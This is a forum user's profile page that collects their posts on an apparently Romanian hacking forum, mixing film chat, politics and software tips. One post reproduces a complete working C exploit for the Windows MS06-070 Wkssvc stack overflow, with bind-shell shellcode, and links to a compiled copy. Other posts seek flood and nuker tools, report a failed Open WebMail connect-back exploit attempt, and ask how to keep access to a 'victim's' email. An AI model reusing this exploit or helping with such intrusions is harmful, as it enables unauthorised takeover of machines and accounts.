
Christian
Posts: 90
Posts posted by Christian
-
but don't you have anything for Vypress? this one has no effect either... I haven't found a flood program for it
-
Marc et Claude - Tremble (vinil club mix)
& in the queue
Happy Fathers - Bounce
-
I also have a connection via PPPoE (not ierdeesh) with 3 pricing plans
1. Non-stop net = 10$
2. 12 hours/day = 7$
3. 200 hours/month = 7$
but I understand that with the 3rd option there is a trick by which you can connect even if you have used up the 200 hours... does anyone know anything??
-
flyppy wrote: man, sorry, but a little grammar wouldn't hurt you...
honestly, it wouldn't hurt you either :@
it probably doesn't work only in a LAN... the IP you are shutting down must have port 135 (or 445... I'm not sure) open... but most providers block these ports and in most cases it won't work
-
come on, you're already getting into SF... now I'm starting to understand why some films are prohibited for children under 12
anyway, the story about the virus called stupidity is REAL!! I know a few infected people... luckily it's not contagious
-
which version of Windows is affected? I'm guessing Win2k
I tried on WinXP SP1 and SP2 and it doesn't work...
-
beerlover0008 wrote: Yes, he built many houses, but he holds the property rights; whenever something doesn't suit him he can throw those people out into the street...
I don't think he would do that... he is trying hard to rise in the eyes of Romanians... you can imagine how Romanians would look at him if he kicked them out of their houses
beerlover0008 wrote: He also bought himself a party; I saw him in a short video made before 1989 having fun with the comrade generals.
so what... don't you have fun?
beerlover0008 wrote: My opinion is that he rather thinks he's a prophet; he uses religion only to seem like a great man.
your opinion!
beerlover0008 wrote: I don't see the point of exorcising a stadium before a match, and the many other stupid things he does.
he knows what he knows... look, God helped him today too... he drew with Pandurii :@ great luck
beerlover0008 wrote: I wonder how he made his fortune, did his sheep have golden wool?
they certainly don't have golden wool, but he has the little wheels in his head well oiled
conclusion... JIJI RULZZZZZZZ !!! :@
-
/***************************************************************************
Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:[url]http://ruder.cdut.net/default.asp[/url]
Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.
Should work on Windows 2000 Server SP4 (All Languages)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
[url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url],
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")
unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";
unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";
unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";
unsigned char NTCreate_AndX_Request[]=
"x00x00x00x64xffx53x4dx42xa2x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
"x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
"x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";
unsigned char Rpc_Bind_Wkssvc[]=
"x00x00x00x92xffx53x4dx42x25x00"
"x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
"x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
"x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
"x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
"x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
"xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
"x9fxe8x08x00x2bx10x48x60x02x00x00x00";
unsigned char Rpc_NetrJoinDomain2_Header[]=
"x00x00x00xa8xffx53x4dx42x25x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
"x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
"x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
"x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
"x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
"x00x00x00x00"
"x16x00" //opnum,NetrJoinDomain2
"x30x2ax42x00"
"x0ex00x00x00"
"x00x00x00x00"
"x0ex00x00x00"
"x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
"x00x00"
"x10x01x00x00"
"x00x00x00x00"
"x10x01x00x00";
unsigned char Rpc_NetrJoinDomain2_End[]=
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x01x00x00x00";
unsigned char *lpDomainName=NULL;
DWORD dwDomainNameLen=0;
/* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9"
"x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31"
"x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45"
"xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57"
"x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6"
"x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25"
"xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
"xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e"
"x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e"
"x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc"
"xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d"
"xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f"
"x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6"
"x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
"xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99"
"x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e"
"xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3"
"x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31"
"x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f"
"x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e"
"x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
"xbaxa6xf5x31x39x59x23xce";
DWORD fill_len_1 =0x84c; //fill data
DWORD fill_len_2 =0x1000; //fill rubbish data
DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]= //jmp 8
"xEBx06x90x90";
unsigned char *Rpc_NetrJoinDomain2=NULL;
DWORD dwRpc_NetrJoinDomain2=0;
unsigned char recvbuff[2048];
void showinfo(void)
{
printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
printf("page:http://ruder.cdut.net/default.aspnn");
printf("Code fixed by S A Stevens - 16.11.2006n");
printf("Should work on Windows 2000 Server SP4 (All Languages)nn");
printf("usage:n");
printf("ms06070 targetip DomainNamenn");
printf("notice:n");
printf("Make sure the DomainName is valid and live,more informations seen");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");
}
void neg ( int s )
{
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}
void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;
dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
memset(lpDomainName,0,dwDomainNameLen);
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
len=dwDomainNameLen+ //DomainName
fill_len_1-3*2+ //fill_len_1
4+ //jmp 8
4+ //addr jmp ebx
sizeof(shellcode)-1+ //shellcode
fill_len_2+ //fill_len_2
2; //0x0000
b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}
dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
len+
sizeof(Rpc_NetrJoinDomain2_End)-1; //end
//malloc
Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
if (Rpc_NetrJoinDomain2==NULL)
{
printf("malloc error!n");
return;
}
//fill nop
memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//update para1 length
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
//copy header
memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
//copy DomainName
memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;
//calculate offset
j=j+fill_len_1-3*2;
//jmp 8
memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;
//jmp ebx address
*(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
j=j+4;
//copy shellcode
memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;
//fill data
memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;
//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
Rpc_NetrJoinDomain2[j+2]=0x00;
j=j+3;
}
//copy other parameter
memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
}
void main(int argc,char **argv)
{
WSADATA ws;
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WORD userid,treeid,fid;
WSAStartup(MAKEWORD(2,2),&ws);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)445);
printf("[+] Connecting %sn",argv[1]);
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("Connection Error, Port 445 Firewalled?n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(WORD *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(WORD *)(recvbuff+0x1c); //get treeid
//send NTCreate_AndX_Request
memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
if (ret<=0)
{
printf("send NTCreate_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
fid=*(WORD *)(recvbuff+0x2a); //get fid
//rpc bind
memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf("send Rpc_Bind_Wkssvc error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
MakeAttackPacket((char *)argv[2]);
memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
*(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length
ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
if (ret<=0)
{
printf("send Rpc_NetrJoinDomain2 error!n");
return;
}
printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
// milw0rm.com [2006-11-17]
and the compiled version:
http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
-
I apologize... I lost the previous version, source and all, after an unplanned format
and I made this version afterwards, in a hurry, and I probably got something wrong... I'll make time these days to fix any mistakes :@
-
Shocker wrote: Christian wrote: there would also be a 3rd option, namely hiding with the help of the attrib command
e.g.: in CMD you give the command "attrib +H +S FolderName"
this way the folder will be completely invisible
It's not completely invisible.
With the attrib +H +S command you make it Hidden and System, but if you go to Folder Options > Show hidden files and folders and uncheck Hide protected operating system files, you will see it
yep` ...u`r right, but let's be serious... how many do you think know about that option? I for one didn't know
-
there would also be a 3rd option, namely hiding with the help of the attrib command
e.g.: in CMD you give the command "attrib +H +S FolderName"
this way the folder will be completely invisible
-
-
I really needed an exploit for Open WebMail... I tested it on Open WebMail version 1.81 and the result is:
[+] Listen on port: 4444
[+] Prepairing ShellCode...Done!
[+] Inject Shellcode to out host...Done!
[+] Chmod our ShellCode on host...Done!
[+] Exec ShellCode...Done!
[+] Wait for Connect-back
Can't Hack
User defined signal 2
any ideas ? :?
-
10x ppl! I haven't seen most of the films you mentioned, so I have plenty to download, no joke... luckily the provider increased my download speed again
btw if anyone knows more names of films worth taking a look at, I don't think anyone would mind if you posted them here
-
recuento wrote: Christian wrote: :@ :@
r u crazy dude?
at the 2 MB it takes up, what does it know how to do? download the whole internet?
if it were 150% detectable and you were selling on credit, I swear I'd have bought it
if the server takes up 2 MB... how much does the edit server take up? just asking because I'm short on space these days :@
Smart noob, in case you didn't realize, it's 150% a joke, probably made because of some people's insistence on convincing him to make who knows what for them.
n00b, what would I do without you? I'd probably be better off
I realized it was a joke and replied with another joke, n00b
-
what films have you seen lately that left a good impression on you?
can someone point me towards 1-2 good films? (newer ones if possible) because honestly I'm fed up with watching total crap films (and when I say total crap I mean TOTAL CRAP !!!) I don't want to waste my time pointlessly on such films anymore so ..give me some names !?!
-
happy birthday SpiridusuCaddy !!
may you have money and riches... but tell me where you keep them
-
10x virusz for the programs
I for one get along well with rapidshare... I download from them at maximum speed (62 kB/s), whereas from urban I get at most 30 kB/s
the only disadvantage is that on rapidshare files expire fairly quickly
speaking of VC++... in case anyone grabs it...
it won't install just by running Setup.exe... to install it follow these steps:
1. make a copy of the file setup/VS98ENT.STF and rename it to acmsetup.STF
2. copy everything the /setup/ folder contains into the folder above it (the one that contains ACMBOOT.EXE)
*. don't forget to also put acmsetup.STF in the folder that contains ACMBOOT.EXE
3. install by running the file acmsetup.exe or Setup.exe
4. Enjoy it!
I haven't tested the other programs and I don't know whether they cause problems on installation
-
Scarto can write in Chinese too... since it's a VIDEO TUTORIAL you should understand
nice post YceFire
-
-
Jobasan2 wrote: Shakira porn movie!
this one is selling cucumbers to the gardener :@
Scarto wrote: Jobasan2 wrote: Shakira porn movie!
How lame! =) It's an .exe archive (most likely bots)
more precisely a trojan downloader
-
eddie47 are you sure you also tried "neptune"?
btw Uranus is the 7th planet from the sun
-
BizZaroO wrote: hey guys!!!! what's the password for the second game? it doesn't go like lvl 1
function Try(passwd) {
    // The password is compared in client-side script, so it is visible in the page source
    if (passwd == "h4x0r") {
        alert("Alright! On to level 2...");
        location.href = "level2-xfdgnh.xhtml";
    }
    else {
        alert("The password is incorrect. Please don't try again.");
        location.href = "http://www.disney.com/";
    }
}
you can find this in the page source
but what charm does the game have left if someone else tells you the answers?
try to discover them yourself
-
this method seems safer to me than the one with the browser cookie
is there any way I can have access to the victim's mail for more than 24 h?
Counter Strike flood (and more) - WORKS
in Hacking programs
I already knew that... but I can't find any nuker that has any effect on it... come on, we're already starting to go off-topic.